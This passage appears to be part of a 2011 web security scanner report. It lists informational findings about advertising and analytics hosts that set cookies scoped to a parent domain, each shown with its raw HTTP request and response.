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

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_kpxr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_kpxr=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SZJZ="MLsXtSUNZzhvJpH4+tKkOoj8ntlBfYhpEw27Sgdm26iivu1jMXrkolpihGBj4umiKbjeSRFG1WGV7v3P2wuhddhrqwvMRjk0BenkJXocfzEwn+Nqhfv9uk/5yFLDCoDEiXP/hOV/sixRxjRF5rWB9KnHODU3B/yiV31fU9eC47+7M/+n0rHdBD4ZxTqL+i57Kfedz/cOyQJ/yqrT8WH56MJW2k/Y9CySxYR40lREQTsrWG7iHX/ZXcgbRha1qYshbnj41ek4M+T6JcKCxkbH15JB/en3mXv1AsBpaE/NatqWqHNyHQHJfAhdEnyH1+AAopspuM3siXVWxrdxhMapoJxsBhSSal7CXpZYG+uwKX6/HBBoo1QiOnTYinh15lebN38dWtzvNR2O+WFyXzCozolPtxDwm0dHcYAcuFfIr8QFcmjsXeoy54UcbFQfkl9uHXtLBbnuMbnFxbNwaHE//LzUfc5hb2GScAS+tt37fQYS17jN3hBQaRrUBkzt7rfFLMsvMHbbyYv3KfLRCE3w09MCuPqRLiZY3ytjjsY6apkPVVkOf7RGTxh3YfEL6eFDcKTCpWqfnef4KW5APHU9wMNAvLlgroCAf/NhO2U3Y/GfwP4tEvTYLJN23RLPRD8S8OCoPmsUEcTjYSdXrAa+japzdcP3mqBhAwNNo4MEXKPVwsppVJe0EX3fGU/z4laDN06Bl4R1L1Ud+xKxsSeEJJVA4fdmtNkncbfRp/AuusRsiMiJmM8wEh9cHMeuWvC/1JGAquOj+tGnyCfumeubLuDosKPCGVUatVhMm8Un4rKjml83L7IXGsViPmi+mSBR6ghqHQjD4aMO749hTnc8Y8YtOlKc7ILWPtzWq1qxsPOFXM/G/zC/lKJdZpuX37zzVp/oTsbOePRvoa6pns4A4/pYni1f1cOWO4QmossHVIGr7gqKt2dJIcAbrZspS2DHtJse2yV6D948mxs5iyfph8iLvlPiGAk70vnVSIWhOxIRAf1Hubw1TQuNP9oTufqhhBrP9GvCENRUI1T3eVdbDJcIJdZFtu6QHj8+l4WNRDiGqpozNwcSCkTIbu9FwpFhC0Hh4P0m7hqR4Kv6Lei7atV+4x3ApSzcU30KQIJYd24qeaXX0AM2NZKIsIh/PCCWU30b2w1A+4XoXLNY9hpJjWMQAk2uIG/HXtcco1ZuZjVGniEqwPjgK3X0T7ZWByLmJvp8X3Klk8GibfUeyNvNx6XGzxASGUkyGEWOfMUp9fjZ6IpP+EVsoSlBDHB+J8FDy1Tna3CDV1xsTytG+31h1s3uvGX6QIQ3GbvJENudrwhqTQb3dewEm3Rg/SAyb0xljjjF/rEoV/y1xhGU6vwWSmXhsTq0YU2p5nRFroYcOuwzmqM5qplSuVq/oPqIEHSWbSxqLpJLHzwjNOZLwAqynbTkWi6aUeO3RHvwfmwQ70KqDFHoSqXTseyacFksSkrt04Fkkh7y+uzYAwdvOl7Jd3QinEFa0FNW49rkGHj3tqQ7u6bJXw+d0dwc5+xla32jQflwdmRpSh1ssB1xZMcK7cy3AYW/iT+NpHbx"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=699224&t=2
Content-Length: 0
Date: Tue, 19 Jul 2011 14:57:47 GMT


13.26. http://adx.adnxs.com/mapuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adx.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=181&user=CAESECFrKvBlT-cBj-xM8B2ECfY&cver=1 HTTP/1.1
Host: adx.adnxs.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz03MyZweGlkPTY5MzE%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChII1LEDEAoYASABKAEwoIvs8AQQoIvs8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw)mByB_/)J710+(4l>TXOaXO%_6_36WM4Yq>skA[s/0Qr@W!2(.G`g(nU07x`Dpe)H6bl?7IA=UWwJ)Ks9?Di4J!>jF#A1tamxhGS]Vloy'Tm2mh=Li=?aU3%!AdhY?VG2rb.jLRacQ9Eg:k5=<AryA-#Y5DZ'8pFj/d9H`0J+H%H=(=1-c5UJXSLk-@qNNZSA+r5AD!_#>ruY2:2hJR1=WDQ9@`U`OJ6f6(uA0%=-ZM>rQPnbc5lqWa^$buUIRRbVnem@21?n/CYuwpeFBs##K0E*W>..9dqmsSak?KkXe09CGc*+$9q2tJ4>/E8+7TYMhEbZEJ!7=DPbftrOh:Xzf+:(dSbb.h'3LCH[34PMTgG6KE^$4d`O9*?AAeZHBSQ8+EbDf=/q'EQ_Yo51AlFgIcie^uPj]Y!4>XYkWO<ke)sc@yb3F`MA6DRs`AgOQBx7EJTw7U]ovu.$(d_gvLL+WcVA$UMBF6t=*]WH[<9I9qV0bWjU8IgZ(2eSjuq.)c2[57vyU#<EqD1'_BZBcD237CLvUgUT'f+UkTYi[Pun_r7[w7K@yf8>:19J=Mv(1[`:3i<f[V)AN.masdUq**VuF+h'!l!6Ej0V!/y-@3m1nC/9cF[kw$/VjSSo3h0w2e2*q0!_v+vxBM@wJ?FFX0tRR)O9P<u6gB)wmh*SNVa*@Ln<::/90pW!Z_/<of@*$LQFY8VhmR4wqVI=v]p4+YOrmsG$Se4Vc'BQP(3Ala%#1YD-1oBLaYc8Ec6S'j<7>vhHD8o/Q21I`jp9R$-%^F3b-ywizA@B5$aV':mlud

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:26:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 20:26:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 20:26:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw)mByB_/)J710+(4l>TXOaXO%_6_36WM4Yq>skA[s/0Qr@W!2(.G`g(nU07x`Dpe)H6bl?7IA=UWwJ)Ks9?Di4J!>jF#A1tamxhGS]Vloy'Tm2mh=Li=?aU3%!AdhY?VG2rb.jLRacQ9Eg:k5=<AryA-#Y5DZ'8pFj/d9H`0J+H%H=(=1-c5UJXSLk-@qNNZSA+r5AD!_#>ruY2:2hJR1=WDQ9@`U`OJ6f6(uA0%=-ZM>rQPnbc5lqWa^$buUIRRbVnem@21?n/CYuwpeFBs##K0E*W>..9dqmsSak?KkXe09CGc*+$9q2tJ4>/E8+7TYMhEbZEJ!7=DPbftrOh:Xzf+:(dSbb.h'3LCH[34PMTgG6KE^$4d`O9*?AAeZHBSQ8+EbDf=/q'EQ_Yo51AlFgIcie^uPj]Y!4>XYkWO<ke)sc@yb3F`MA6DRs`AgOQBx7EJTw7U]ovu.$(d_gvLL+WcVA$UMBF6t=*]WH[<9I9qV0bWjU8IgZ(2eSjuq.)c2[57vyU#<EqD1'_BZBcD237CLvUgUT'f+UkTYi[Pun_r7[w7K@yf8>:19J=Mv(1[`:3i<f[V)AN.masdUq**VuF+h'!l!6Ej0V!/y-@3m1nC/9cF[kw$/VjSSo3h0w2e2*q0!_v+vxBM@wJ?FFX0tRR)O9P<u6gB)wmh*SNVa*@Ln<::/90pW!Z_/<of@*$LQFY8VhmR4wqVI=v]p4+YOrmsG$Se4Vc'BQP(3Ala%#1YD-1oBLaYc8Ec6S'j<7>vhHD8o/Q21I`jp9R$-%^F3b-ywizA@B5$aV':mlud; path=/; expires=Mon, 17-Oct-2011 20:26:10 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:26:10 GMT

GIF89a.............!.......,........@..L..;

13.27. http://api.choicestream.com/instr/api/8e360375d27a5381/a1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.choicestream.com
Path:   /instr/api/8e360375d27a5381/a1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /instr/api/8e360375d27a5381/a1?protocol=ScriptInclude&callback=csAny.Transport.callback&request_id=0&json_id=a0b60e38bae29543e86fa96644275bba&json=%7B%22discoveries%22%3A%5B%5D%2C%0A%22activities%22%3A%5B%7B%22type%22%3A%22item_views%22%2C%0A%22attrs%22%3A%7B%22item_id%22%3A%22event_000043582C516D43%22%7D%7D%5D%2C%0A%22get_recos%22%3A%5B%5D%2C%0A%22context%22%3A%7B%22appcontext%22%3A%22tm_event_on_sale%22%2C%0A%22api_key%22%3A%228e360375d27a5381%22%2C%0A%22cookie_id%22%3A%2223fe7a5564101842925261f744f3ff01%22%7D%2C%0A%22transport%22%3A%7B%22endpoint%22%3A%22http%3A%2F%2Fapi.choicestream.com%2Finstr%2Fapi%22%7D%2C%0A%22__cs_rr%22%3A%221%22%7D&_=1311100563081 HTTP/1.1
Host: api.choicestream.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CSAnywhere=823c0d1c-2cc2-444c-b394-ea0d63b3dc5e

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-CS-Request-Id: 466791c2-9f94-48c8-8658-3ff00fec0bac
P3P: policyref="http://www.choicestream.com/w3c/p3p.xml",CP="NOI DSP COR NID ADMa DEVa PSAo PSDo OUR STP"
Last-Modified: Tue, 19 Jul 2011 18:36:30 GMT
Content-Type: text/javascript;charset=UTF-8
Cteonnt-Length: 81
Cache-Control: private
Content-Length: 81
Date: Tue, 19 Jul 2011 18:36:30 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: __cs_sp=1; Domain=.choicestream.com; Expires=Wed, 18-Jul-2012 18:36:30 GMT; Path=/
Set-Cookie: CSAnywhere=823c0d1c-2cc2-444c-b394-ea0d63b3dc5e; Domain=.choicestream.com; Expires=Wed, 18-Jul-2012 18:36:30 GMT; Path=/

csAny.Transport.callback('0',{"status":{"message":"OK","code":0},"reco_sets":[]})

13.28. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=7&c2=8097938&rn=38081733&c7=http%3A%2F%2Fseg.sharethis.com%2FgetSegment.php%3Fpurl%3Dhttp%253A%252F%252Fwww.factset.com%252Fproducts%252Fim%26jsref%3Dhttp%253A%252F%252Fwww.fakereferrerdominator.com%252FreferrerPathName%253FRefParName%253DRefValue%26rnd%3D1311085610127&c3=8097938&c8=ShareThis%20Segmenter&c9=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fim&jsref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&rnd=1311085610127
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Tue, 19 Jul 2011 14:26:45 GMT
Connection: close
Set-Cookie: UID=7bff5a9c-72.246.30.32-1308590022; expires=Thu, 18-Jul-2013 14:26:45 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


13.29. http://b.scorecardresearch.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=2101&c3=1234567891234567891&c15=&cv=2.0&cj=1 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://waypointlivingspaces.com/introducing-waypoint/?banner=110523
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:49:01 GMT
Connection: close
Set-Cookie: UID=7bff5a9c-72.246.30.32-1308590022; expires=Thu, 18-Jul-2013 20:49:01 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

13.30. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=3005403&d.c=gif&d.o=nytbglobe&d.x=138794305&d.t=page&d.u=http%3A%2F%2Fboston.com%2F&d.r=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Tue, 19 Jul 2011 20:43:27 GMT
Connection: close
Set-Cookie: UID=7bff5a9c-72.246.30.32-1308590022; expires=Thu, 18-Jul-2013 20:43:27 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

13.31. http://b3.mookie1.com/2/ticketmaster/minorcat/1/11408426983@x02  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/minorcat/1/11408426983@x02

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2/ticketmaster/minorcat/1/11408426983@x02? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:05 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFM=011QjF9J810JLQ|U10MCo|U10QMP|010TqE; expires=Fri, 19-Jul-13 18:36:05 GMT; path=/; domain=.mookie1.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 9
Content-Type: text/html

<!-- -->

13.32. http://bcp.crwdcntrl.net/4/c=520|rand=478684930|pv=y|rt=ifr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /4/c=520|rand=478684930|pv=y|rt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=520|rand=478684930|pv=y|rt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
